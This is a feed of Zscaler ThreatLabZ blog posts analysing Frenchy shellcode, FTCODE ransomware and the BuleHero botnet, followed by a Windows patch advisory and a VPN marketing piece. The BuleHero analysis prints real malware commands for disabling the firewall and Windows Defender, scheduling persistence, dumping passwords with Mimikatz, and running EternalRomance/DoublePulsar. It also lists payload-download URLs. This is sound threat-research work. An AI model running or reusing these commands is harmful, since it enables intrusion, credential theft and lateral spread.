- Pub
- Var
Feed aggregator
Frenchy – Shellcode in the Wild
For the past few months, the Zscaler ThreatLabZ research team has seen a number of AutoIt and .NET samples from different malware families using what is being called Frenchy shellcode. The name is so given because of the mutex name it creates: frenchy_shellcode_{version}. In this blog, we will provide a brief analysis of a .NET sample using the Frenchy shellcode and also provide an overview of various malware types that are using it.
As the execution of the malware begins, it extracts an embedded compressed resource with the name asmz://4da3bcc9092d2b15c67c8bb6a3248c6d/279552/z. When decompressed, this resource turns out to be a dynamic-link library (DLL) file, which is also .NET compiled with the MD5 2d80d567add3e9ebe93118c28fd96ad8.
Figure 1: Decompression routine
Figure 2: Compressed resource name stored in the variable
Control is transferred to this extracted DLL by invoking one of its routines named Average().
Figure 3: Average() function invoked in the extracted DLL
During execution, this DLL extracts the embedded AES-encrypted resource with the name 501Yek31KY. The AES key used for decryption is hardcoded with the value zlauDo4j2s76f3bAu7vJla9qxo4T9fDA. On decryption, the file turns out to be another .NET compiled executable with the MD5 9f93df82804d1467ba0096f91ecf091b.
When execution begins, the executable performs two checks for virtual environment detection and terminates itself if either of the two is successful:
1. If SbieDll.dll is present
2. If the caption of the main window of any of the running process is empty
For persistence, it creates a copy of itself in the %APPDATA%/Tasks/ folder with the name ThumbnailExtractionHost.exe, a VBS file with the name vTzzHA5v.vbs in the same folder to invoke ThumbnailExtractionHost.exe and a URL file in the startup directory with the name 89f429NZ.url to invoke vTzzHA5v.vbs.
Finally, the Frenchy shellcode and the main malware binary are extracted. This executable contains two resources encrypted with Advanced Encryption Standard (AES). One resource with the name 9BMPzLT7ztLkxO7r contains the Frenchy shellcode and another with the name HC8354RuK8FCQSpg contains the main malware binary.
Figure 4: AES encrypted resource – malware payload
Figure 5: Extracted main malware payload [MD5: ac8ef8b4aeede1adab7366ca7e5a75be (AgentTesla)]
Figure 6: AES encrypted resource – Frenchy shellcode
Figure 7: Extracted Frenchy shellcode [MD5: abdb5f121849f3f3718768d37abe0173]
Memory is allocated for the shellcode and main payload. Control is transferred to the Frenchy shellcode by creating a delegate using its memory location pointer along with two arguments:
Currently executing binary full path
Pointer to memory location of main payload
Figure 8: Control transferred to Frenchy shellcode memory location
Frenchy Shellcode Analysis
The main functionality of the shellcode is to perform hollow process injection, which injects malicious code in system memory. Execution of the shellcode starts with a relative jump instruction with the two arguments passed to the shellcode available on the stack.
Following the jump instruction, all the strings that will be used by the shellcode are generated on the stack. The interesting thing that this shellcode does is map all the required DLL again in the memory and make further calls via these newly loaded DLLs. This function helps bypass API monitoring that is done by some sandboxes in the user space. Four DLLs, namely advapi32.dll, ntdll.dll, user32.dll, and kerne32.dll, are mapped using the ZwOpenSection and ZwMapViewOfSection APIs. The DLL name used for ZwOpenSection is in the following format: \\KnownDlls32\\{dll_name}.dll.
Once the kernel32.dll is loaded, Frenchy shellcode extracts the address of LoadLibrary and GetProcAddress to load further required DLLs and extract necessary API addresses.
Now, when this initialization phase is complete, the shellcode’s main functionality begins. First, it creates the mutex with the name frenchy _shellcode_{version} where {version} is 002 in this case.
Figure 9: Frenchy shellcode version 002
Frenchy shellcode creates a process of currently executing binary in suspended mode.
Figure 10: Creating new process in suspended mode
It creates a new section to be shared with the newly created process.
Figure 11: Shared section
Finally, the shellcode maps the view of this section into a newly created process, copies the main malware payload to this mapped view, modifies and sets the context of the newly created process, and starts the process main thread by calling NtResumeThread.
Malware variants using the Frenchy shellcode:
Win32.Backdoor.404Keylogger 6a8a308fd9d93877405edddaca2dc0b1
Win32.Backdoor.AgentTesla ff87170119ffe5da1a9933eac4813e89
Win32.Backdoor.AysncRAT 4e0620db87741809db739b36d493efd3
Win32.Backdoor.DarkComet aca05d97aa34360a18ce7e4a331195b8
Win32.Backdoor.HawkEye c1da6168e4ce782169295858057d6a82
Win32.Backdoor.Keybase db5fe533c78602a3d4e5a2a307782855
Win32.Backdoor.LimeRat 7f3b73f4680cd45b2f06cd991c26b60a
Win32.Backdoor.Nanocore d18509eb899f634f579e154b226c1f72
Win32.Backdoor.NetWiredRC 2d1ed53e7af0864f0916a4ce4f5e40b7
Win32.Backdoor.NjRat a7b38bf292212efd6c0bf11060483b19
Win32.Backdoor.NjRatLime 88c674e2dcd55b5e8672c1a063d06fd4
Win32.Backdoor.PhoenixKeylogger 382609b2a5c90f287b466f55911238d2
Win32.Backdoor.PredatorLogger 16cbd896990793871fd3fd7bcd23cf1a
Win32.Backdoor.QuasarRAT db07aca234c3f12a141760cfc6a46e0e
Win32.Backdoor.RemcosRAT 4ef1c56657d74aa09d77573273f99750
Win32.PWS.AZORult 6e33a3075b667eab19647f1d149a510f
Win32.PWS.FormBook 6e685961cc335b33d05e6415700fcf96
Win32.Ransom.Adame 20716b0abbf051ec151fecc0cc957145
Win32.Ransom.Phobos 0e1b676f95c0e51163178ffdd99817c8
Win32.Trojan.APT33 9aa2f7959f31196f6c5aa37ae3c5a2ae
Conclusion
Zscaler ThreatLabZ is actively tracking this mode of delivery and malware families involved to ensure coverage for Zscaler customers.
Categories: Security Posts
FTCODE Ransomware — New Version Includes Stealing Capabilities
Recently, the Zscaler ThreatLabZ team came across PowerShell-based ransomware called “FTCODE,” which targets Italian-language users. An earlier version of FTCODE ransomware was being downloaded using a document file that contained malicious macros. In the recent campaign, the ransomware is being downloaded using VBScript.
Figure 1: FTCODE downloaders observed in the Zscaler cloud (Office documents in red and VBScripts in yellow)
The latest version we’ve seen in the Zscaler cloud contains version number 1117.1. We also came across this malware with version numbers from 1001.7 to 1117.1. In this blog, we’ll describe the infection method and its techniques for stealing credentials.
Technical details
Infection starts with spam emails containing malicious macro documents and, more recently, containing links to VBScripts that further download a PowerShell script known as FTCODE ransomware. Once a user executes the VBScript, it executes the PowerShell script shown in the screenshot below.
Figure 2: PowerShell script to download a decoy image and the ransomware
The script first downloads a decoy image into the %temp% folder and opens it trying to trick users into believing that they simply received an image, but in the background, it downloads and runs the ransomware.
Figure 3: Decoy image
The downloaded script is saved in %Public%\Libraries\WindowsIndexingService.vbs. The screenshot below displays the command-and-control (C&C) request for downloading the VBScript.
Figure 4: C&C communication request to download VBScript
Persistence
Further, the malware creates a shortcut file called windowsIndexingService.lnk in the victim’s startup folder, so it will execute at every reboot. The shortcut file executes the %Public%\Libraries\WindowsIndexingService.vbs. It also creates a scheduled task named WindowsApplicationService for executing the WindowsIndexingService.vbs file.
FTCODE checks if the file \%temp%\quanto00.tmp exists. If the file exists and was created more than 30 minutes ago, FTCODE will write the current time in the file; otherwise, it will exit the script. It also checks for the file %public%\OracleKit\w00log03.tmp that contains GUID; if it doesn’t find the file, it writes GUID into the file w00log03.tmp and changes the file attribute to hidden.
C&C communication
The malware sends information to its C&C as shown in the screenshot below.
Figure 5: Sending data to the C&C
ver = 1117.1 version
vid = vb5, specific campaign identifier
guid = GUID
ext = first 6 characters of newly generated GUID (Extension of encrypted file)
r1 = base 64 encoded (base 64 encode(encrypted (8 character GUID + 42 random characters)); Base 64 encoded(encrypted((Random 23 + Random 11))))
The malware creates random characters and is encrypted using the RSA algorithm. The RSA key is hardcoded in the script. Those randomly generated strings are used to generate a password.
After getting a response from the server, the malware writes the current date-time into /%temp%/quanto00.tmp. If it doesn’t get any response, it will terminate itself. After that, it sends another post request to the C&C server with the &status=start parameter as shown below and starts the encryption process.
Figure 6: Sending status update to C&C
Encryption
The malware searches for all drives with at least 50kb of free space and starts encrypting the files with the extensions below.
Figure 7: Extension list for encryption
FTCODE generates a password using GUID and a random character set generated earlier. It uses Rijndael symmetric key encryption to encrypt the 40960 bytes of each of the above extension files. The initialization vector is based on 11 randomly generated characters.
Figure 8: Encryption code
After encrypting files, FTCODE appends the extension to the “first 6 characters of newly generated GUID” and drops the ransom note "READ_ME_NOW.htm" in the directory that contains the encrypted files. The personal ID in the ransom note is the newly generated GUID.
Figure 9: Ransom note
The earlier FTCODE version’s encryption key was generated based on a hardcoded string "BXCODE hack your system" and randomly generated key. The earlier version’s initialization vector was based on the hardcoded string "BXCODE INIT." The earlier version (1001.1) of FTCODE adds the .FTCODE extension after encryption. All versions use the same ransom note.
Stealer capability
The latest version of FTCODE added stealing functionality which was absent in earlier versions. It steals credentials from the browsers below as well as email clients.
Internet Explorer
Mozilla Firefox
Mozilla Thunderbird
Google Chrome
Microsoft Outlook
Internet Explorer
The script steals the stored credentials from the Internet Explorer web browser and gets the history folder using $shell.NameSpace(34). It takes history details and decrypts the stored credentials from information in the registry HKCU:\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. It also checks to see if the operating system is above Windows 7, then it fetches credentials from the vault as shown in the code below.
Figure 10: Code to steal credentials from vault
Mozilla Firefox and Mozilla Thunderbird
The script checks the below paths and fetches the credentials from the Mozilla Firefox browser and the Mozilla Thunderbird email client.
SystemDrive\Program Files\Mozilla Firefox
SystemDrive\Program Files\Mozilla Thunderbird
SystemDrive\Program Files (x86)\Mozilla Firefox
SystemDrive\Program Files (x86)\Mozilla Thunderbird
Google Chrome
The script steals credentials from the Google Chrome browser from the file \%UserProfile%\AppData\Local\Google\Chrome\User Data\*\Login Data.
Figure 11: Code to steal credentials from the Google Chrome browser
Microsoft Outlook
The script steals saved credentials by accessing the following registry key.
HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
HKCU:\Software\Microsoft\Office\1[56].0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
Next, it sends a post request with the guid=temp_1235266078&crederror=start chooseArch data to kind.its1ofakind[.]com. Further, it sends the stolen data to its C&C as shown in the below screenshot.
Figure 12: Sending stolen credentials to C&C
guid = hardcoded in script
cred = stolen credentials
The stolen credentials are in the below format. Username and password are Base64 encoded.
Format: {"URL":[{"Username":"Password"},{"Username":"Password"}]
Finally, after sending data, it sends a post request with guid=temp_1235266078&crederror=SUCCESS.
Conclusion
The FTCODE ransomware campaign is rapidly changing. Due to the scripting language it was written in, it offers multiple advantages to threat actors, enabling them to easily add or remove features or make tweaks much more easily than is possible with traditionally compiled malware. The Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.
IOCs:
Md5
d597ea78067725ae05a3432a9088caae
c8a214f432fc9d74c913c02e7918fc0
f96253923e833362ecac97729d528f8c
cc0f64afa3101809b549cc5630bbd948
328ce454698307f976baa909e5c646c7
71a8d8c0543a99b8791e1cfaeeeb9211
f0aa45bb9dd09cfac9d93427a8f5c72c
d6da191bfc5966dd4262376603d4e8c1
cc5946ce893ff37ace8de210923467a2
7f5bb4529b95a872a916cc24b155c4cc
edd5fbe846fa51f3b555185627d0d6c5
a2e88f9486cc838eae038a8ba32352f3
eab63ee2434417bc46466df07dc6b5b5
fd46c05b99d00e11d34b93eae2c7ff2b
98d2221445c2c8528cef06e4ef3c9e36
URLs:
luigicafagna[.]it
home[.]southerntransitions[.]net
nomi[.]tugnutz[.]com
home[.]ktxhome[.]com
dhol[.]rkeindustries[.]net
way[.]securewebgateway[.]com
stats[.]thomasmargiotti[.]com
pups[.]pupusas[.]net
print[.]impressnaples[.]com
print[.]impress-screen-printing[.]com
power[.]hagertyquote[.]com
men[.]unifiedthreatmanagementutm[.]com
kind[.]its1ofakind[.]com
ese[.]emarv[.]com
ehuxmtkxmdqy[.]top
connect[.]simplebutmatters[.]com
connect[.]heritageagencies[.]com
ceco[.]heritageins[.]co
cdn[.]danielrmurray[.]com
bxfmmtkxmdqy[.]top
biz[.]lotsofbiz[.]com
amq1mtkxmdqy[.]top
ahmwmtkxmdqy[.]top
agvlmtkxmtq4[.]top
agvlmtkxmdqy[.]top
Categories: Security Posts
Critical Windows Update - CryptoAPI Spoofing, Windows Remote Desktop vulnerabilities
Background
Earlier today Microsoft released several security updates as part of its regular monthly updates known as Patch Tuesday. Some of the issues that were patched in today's update are critical and has prompted an emergency directive from Cybersecurity and Infrastructure Security Agency (CISA) for certain U.S. government agencies. It is important for everyone running the vulnerable operating system to apply this security update. Large organizations following 15/30/60-day patch cycles should consider making an exception and apply the patches as soon as possible, especially if running one of the vulnerable operating systems.
What are the issues?
1. CVE-2020-0601 - CryptoAPI spoofing vulnerability
A spoofing vulnerability exists in the way Windows CryptoAPI validates the Elliptic Curve Cryptography (ECC) certificates. This vulnerability allows an attacker to use spoofed ECC certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts.
Systems impacted: Several versions of Windows 10 and Windows Server 2016, 2019 [Check the reference for specific details]
2. CVE-2020-0609, CVE-2020-0610 - Windows Remote Desktop Gateway remote code execution vulnerability
An unauthenticated attacker could exploit a remote code execution vulnerability in Windows Remote Desktop Gateway by connecting over RDP and sending specially crafted requests. No user interaction is required for exploiting this vulnerability.
Systems impacted: Windows Server 2012, 2016, 2019 [Check the reference for specific details]
3. CVE-2020-0611 - Windows Remote Desktop Client remote code execution vulnerability
An attacker could exploit a remote code execution vulnerability in Windows Remote Desktop Client by tricking the user into connecting to a malicious server hosting this exploit.
Systems impacted: Several versions of Windows 7, 8, 10 and Windows Server 2008, 2012, 2016, 2019 [Check the reference for specific details]
What can you do to protect yourself?
Apply the security updates released by Microsoft immediately from the following location:
https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jan
Zscaler coverage
Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats, such as ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
We have also deployed several in-line signatures for detecting exploitation attempts of CryptoAPI spoofing vulnerability.
Additionally, Zscaler customers can leverage SSL inspection feature and block such spoofed certificates under 'Untrusted Server Certificates'. This will block any connection to destinations serving such spoofed certificates.
Reference:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611
Categories: Security Posts
Remote Access VPNs Have Ransomware on Their Hands
Another day and, unfortunately, another cyberattack accidentally introduced by VPN.
According to a Computer Weekly article, Travelex was hit by Sodinokibi ransomware, which disabled the foreign exchange company’s IT systems on New Year’s Eve. The attack was made possible when the company forgot to patch its Pulse Secure VPN servers.
Sadly, these reports are becoming common as VPNs are now the favorite target of cybercriminals.
Antiquated leads to attacked
When remote access VPNs were first introduced 30 years ago, they were pretty awesome. Remote access from anywhere was a concept that was forward-thinking and game-changing. But VPNs were created during a time when most apps were running in the data center, which could easily be secured with a bunch of network security appliances.
However, the world has changed as internal apps have moved to the cloud. You have to deliver a great experience, which is what users expect, with the knowledge that 98 percent of security attacks stem from the internet.
Remote access VPNs require servers to be exposed to the internet and users to be placed onto the corporate network through static tunnels that drive holes through firewalls. Now the very same technology built to protect businesses has left them vulnerable to modern malware and ransomware attacks.
So how exactly does this happen?
Footprint of a malware attack
Just this past week, Medium.com published an article describing how Sodinokibi ransomware gets introduced via a VPN. Let’s take a high-level look at the typical process for how malware is introduced to a network through a VPN vulnerability:
Cybercriminals scan the internet for unpatched remote access VPN servers.
Remote access to the network is achieved (without valid usernames or passwords).
Attackers view logs and cached passwords in plain text.
Domain admin access is gained.
Lateral movement takes place across the entire network.
Multifactor authentication (MFA) and endpoint security are disabled.
Ransomware (ex. Sodinokibi) is pushed to network systems.
The company is held up for ransom.
Negative impacts of VPN
Many organizations still feel that remote-access VPNs are necessary. And, in some cases, they may very well be. But, more often, VPNs are opening the network to the internet and, as a result, the business to increased risk.
Patching is often slow or forgotten – Remembering, and even finding time to patch VPN servers, is plain difficult. Teams are asked to do more with less, often creating a human challenge that leads to security vulnerabilities.
Placing users on the network – Perhaps the genesis of all the issues related to remote-access VPNs. For VPNs to work, networks must be discoverable. This exposure opens the organization to attack.
Lateral risk at exponential scale – Once on the network, malware can spread laterally, despite efforts to perform network segmentation (which is a complex process in itself). As mentioned above, this can also lead to the takedown of other security technologies, such as MFA and endpoint security.
The business’ reputation – Your customers trust that you will protect their information and provide the best level of service to them. To do this, businesses must be able to protect themselves. News of a ransomware attack has a detrimental impact on your brand reputation.
Making the case for a new approach
The negative impacts of VPN have led to a search for an alternative solution. Gartner says that this buzz has created a world where, “By 2023, 60% of enterprises will phase out most of their remote access virtual private networks (VPNs) in favor of zero trust network access (ZTNA).”
If you are considering alternative methods, such as ZTNA, keep these points in mind when positioning it to your executives:
Minimize business risk – ZTNA allows for access to specific business applications (based on policy) without the need for network access. Also, there is no infrastructure ever exposed, so ZTNA removes the visibility of apps and services on the internet.
Reduce costs – ZTNA can often be fully cloud-delivered as a service, which means there are no servers to purchase, patch, or manage. This is not limited to just the VPN server. The entire VPN inbound gateway can now be smaller or fully removed (external firewall, DDoS, VPN, internal firewall, load balancer, etc.).
Deliver a better user experience – Given the increased availability of cloud ZTNA services when compared to limited VPN inbound appliance gateways, remote users are provided with a faster and more seamless access experience regardless of application, device or location.
NOTE: Not all ZTNA solutions are the same. Beware of vendors that call themselves “zero trust” but offer solutions that continue to place users on the network and expose business apps to the internet.
If you’re looking to replace your remote access VPN, you might find this page helpful. In the meantime, don’t forget to patch your VPN servers!
Christopher Hines is the Head of Product Marketing for Zscaler Private Access and Z App.
Categories: Security Posts
A look at the recent BuleHero botnet payload
Ever since the 2017 outbreak of WannaCry, NotPetya, and BadRabbit ransomware, as well as the WannaMine cryptocurrency campaign, there has been a steep increase in malware that uses the now infamous ShadowBroker’s leaked exploits—EternalBlue, EternalChampion, EternalRomance, and EternalSynergy—for lateral propagation.
Alongside these exploits, many other modules such as MimiKatz, PsExec, and WMIC have been observed as a means to propagate malware on networks. Traditional attack vectors like brute force attacks are also playing a crucial role in infecting other hosts to spread malware. The ThreatLabZ team is keeping a close eye on these and other new lateral movement techniques and the malware they are attempting to propagate. While doing research on this topic, we landed on a botnet called “BuleHero,” which has a number of lateral movement techniques embedded in it. In this report, we will provide a brief overview of the malware dropped by the BuleHero botnet, while focusing on the lateral movement aspect of BuleHero botnet.
BuleHero is named after the domain “bulehero[.]in,” which was found in the initial botnet binary. This botnet leverages a variety of web exploits to enable it to intrude on unpatched web servers. It also contains many other exploits to help it spread across the network. It not only tries to spread on internal networks but also on the internet. The Zscaler Cloud Sandbox service detected this malware.
URL: aa[.]0xbdairolkoie[.]space/xs.exe
MD5: F864506F9797592321CF4C6A0BB5F199
Let's take a deeper look into the different modules of this botnet.
The “xs.exe” is an installer file that downloads “swpuhostd.exe” from the URL “aa[.]0xbdairolkoie[.]space/swpuhostd.exe” and stores it at “C:\WebKitSdk\2.25.16\swpuhostd.exe” location.
It then fetches the configuration file (cfg.ini) from one of the nine hardcoded URLs.
hxxp://xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini
hxxp://qb[.]1c1c1c1c[.]best:63145/cfg[.]ini
hxxp://ce[.]1c1c1c1c[.]club:63145/cfg[.]ini
hxxp://jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini
hxxp://eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini
hxxp://rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini
hxxp://ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini
hxxp://cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini
hxxp://ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini
Fig 1: BuleHero configuration
The botnet looks for new updates from the IPs 172.104.91.191 and 139.162.2.123. The URL “hxxp://fk[.]0xbdairolkoie[.]space/download.exe” is part of the payload or shellcode used to compromise other machines on the network. Upon successful exploitation, the file downloaded from this rule is executed on the infected system, which, in turn, tries to spread from that machine. The botnet contains an embedded miner file that connects to “mi.oops[.]best:80, mx.oops[.]best:443” mining pool.
On a successful run, it creates a copy of itself at the below location on the infected system.
C:\\Windows\\uhctnicb\\mftzlgg.exe
C:\\Windows\\Fonts\\mftzlgg.exe
%TEMP%\\388954562\\TemporaryFile
To be persistent on the system, the malware does the following:
Creates a service with name “bnttpgkqt” and with BinaryPathName as "C:\\Windows\\uhctnicb\\mftzlgg.exe"
Creates a task with the name “bicfnzlke,” which triggers the main malware file every minute with full permissionscmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"bicfnzlke\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\mftzlgg.exe\"
Makes a run entry with the name “bnttpgkqt” for “C:\Windows\uhctnicb\mftzlgg.exe” at “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”
It also tries to bypass the security measures on the system, like firewalls. The botnet first deletes all the firewall rules and later it adds a few in order to enable access to the NetBIOS and SMB protocol.
Below are the commands found in the binary that manipulates the firewall rules:
netsh ipsec static delete all
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
cmd /c net stop SharedAccess
cmd /c netsh firewall set opmode mode=disable
cmd /c netsh Advfirewall set allprofiles state off
cmd /c net stop MpsSvc
cmd /c net stop WinDefend
cmd /c net stop wuauserv
cmd /c sc config MpsSvc start= disabled
cmd /c sc config SharedAccess start= disabled
cmd /c sc config WinDefend start= disabled
cmd /c sc config wuauserv start= disabled
The malware also changes the below file associations in HKEY_CLASSES_ROOT to txtfile for the files with these extensions “.bat, .cmd, .js, .vbs, .vbe, .reg, .ps1.”
The botnet contains many embedded files in it. It drops those files in the following directory structure at “C:\Windows\ziheeghmq”:
Fig 2: Drop location
Corporate – Mimikatz password grabbing tool
qvrmuzmcf – Port scanning tools
UnattendGC – Eternal Blue attack kit
It drops XMRig miner at “%TEMP%\\cnaqzbggt\\svtink.exe” and it also drops a Gh0st RAT at “%systemroot%\\vqbbqs.exe.”
Payloads
XMRig Miner:
The XMRig miner uses a configuration file “%TEMP%\\cnaqzbggt\\config.json” dropped by the botnet.
Fig 3: XMRig miner configuration file
It’s compiled with open-source XMRig miner and uses “mi.oops[.]best:80” and “mx.oops[.]best:443” mining pool.
Fig 4: XMRig miner network communication
Gh0st RAT:
Gh0st RAT is an open-source RAT. The source code is public and it has been used by multiple groups. First, it creates a service of itself with the name “EaepRegSvc.” It creates a mutex of the name “ox.mygoodluck.best:12000:EaepRegSvc." It makes a DNS request for ox.mygoodluck[.]best to get the IP address, which is 185.147.34[.]106. This RAT communicates on 185.147.34[.]106:12000 to receive commands and send the data with encryption.
Fig 5: Gh0st RAT CNC traffic
Lateral movement
To this point, we have provided a few details about the embedded malware payloads dropped by the BuleHero botnet. Now we will shift our focus to the lateral movement modules, which are embedded in this botnet. Below are the modules that are used to perform lateral spreading.
Port Scanning
In order to spread across a network, it is important for malware to scan the network to identify the exposed and vulnerable machines connected to the network. To achieve this scan, “Swpuhostd.exe” drops a port scanning tool at the location “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\vqfevffuz.exe.”
The botnet first fetches the public IP address of the infected system by accessing “hxxp://v4.ipv6-test[.]com/api/myip.php, from which it generates the IP subnet of the public network of the infected system and stores it into “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\ip.txt.” It also adds intranet subnets and public subnets which are randomly generated by the botnet.
Fig 6: IP subnets in “ip.txt”
After creating the IP ranges, the botnet starts the port scanning module to scan IP addresses specified in the ip.txt with a given port. The botnet also generates ports that are given as input to the below command. It generates ports that belong to web applications. It also contains a few hard-coded ports like 135 (DCE/RPC), 139 (NetBIOS), 445 (SMB), and 3389 (RDP).
Scanning command struture:cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p
Example
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8020
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8040
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7070
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8050
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8282
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8082
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8085
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8087
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8088
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8983
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8060
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8080
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 9090
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8083
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8888
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8181
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 135
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 445
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 80
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 88
In this version of BuleHero botnet, we also observed scanning for an RDP service. The botnet starts this scanning on a hard-coded IP subnet 222.186.55.1-222.186.155.255. It also scans port 80 on this subnet. It saves the IP addresses that have ports 80 and 3389 open to Scantest.txt. The port scanning happens sequentially and its results are accumulated into Result.txt. The results of the scanning process are the active IP addresses that have those ports opened up.
cmd /c vqfevffuz.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ Scantest.txt
Interestingly, the botnet deletes the generated “Scantest.txt” file without using it. This suggests that the BuleHero botnet authors are trying to integrate RDP scanning, possibly enabling future exploits for RDP such as Bluekeep or attacking the RDP service with traditional brute-force attacks.
Fig 7: RDP scanning
Lateral movement components
Mimikatz
The botnet drops the “Mimikatz” tool at “C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe” for dumping passwords from infected hosts. These passwords are used to log into systems connected to the botnet.
cmd /c C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\ziheeghmq\\Corporate\\log.txt
Fig 8: Running Mimikatz to extract credentials
These obtained passwords are then used by PsExec and WMIC to spread the malware onto the network.
PsExec and WMIC
The botnet drops the PsExec tool at the location “C:\\Windows\\ziheeghmq\\Corporate\\scvhost.exe” and it uses the WMIC tool, which is already present on Windows systems. The botnet first launches PsExec to execute the malware on a remote machine, but if it fails it then uses WMIC to execute the malware.
Along with Mimikatz input, the botnet contains a dictionary of usernames and passwords to carry out a brute-force attack on a remote machine.
PsExec command:scvhost.exe /accepteula \\[remote_machine] -d -c -u -p “cmd.exe /c [command]”
Fig 9: Remote execution using PsExec
WMIC command:wmic.exe /node:[targetMachine] /user:[userName] /password:[password] process call create “cmd.exe /c [command]”
Fig 10: Remote execution using WMIC
SMB Exploitation
The botnet stores the ShadowBroker’s NSA leaked Fuzzbunch like the SMB exploitation toolkit at the directory “C:\\Windows\\ziheeghmq\\UnattendGC.” The toolkit contains EternalBlue, EternalRomance, EternalChampion exploits, backdoor DoublePulsar, and the SMBtouch utility.
Fig 11: SMB exploits package
The botnet reads the scanning result of the port scanner tool after running it against ports 139 and 445, which is present at “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\Result.txt.” The botnet runs the SMBtouch utility to scan for vulnerable hosts.
SMB touch command:vimpcsvc.exe --InConfig vimpcsvc.xml --TargetIp 106.51.178.148 --TargetPort 445 --NetworkTimeout 60 --Protocol SMB --OutConfig 106.51.178.148.xml
It then launches SMB exploits onto the vulnerable machine with shellcode, which injects the final payload (AppCapture32.dll or AppCapture64.dll) into one of the legitimate processes of the target machine. Below is one such example in which we observed that EternalRomance was being used to exploit the system.
Eternal Romance and Double Pulsar commandcmd /c docmicfg.exe --InConfig docmicfg.xml --TargetIp 106.51.3.141 --TargetPort 445 --NetworkTimeout 30 --Protocol SMB --Target WIN7_SP1 --TargetOsArchitecture x86 --Credentials Anonymous --PipeName samr --ShellcodeFile Shellcode.ini & svschost.exe --InConfig svschost.xml --TargetIp 106.51.3.141 --TargetPort 445 --DllPayload AppCapture32.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
The payload DLL downloads the BuleHero malware from “hxxp://fk.0xbdairolkoie[.]website/download.exe” and stores it at “C:\\WebKit\\2.250.20\\fxxkmylife0xa.exe” before executing it.
Fig 12: Payload after SMB exploitation
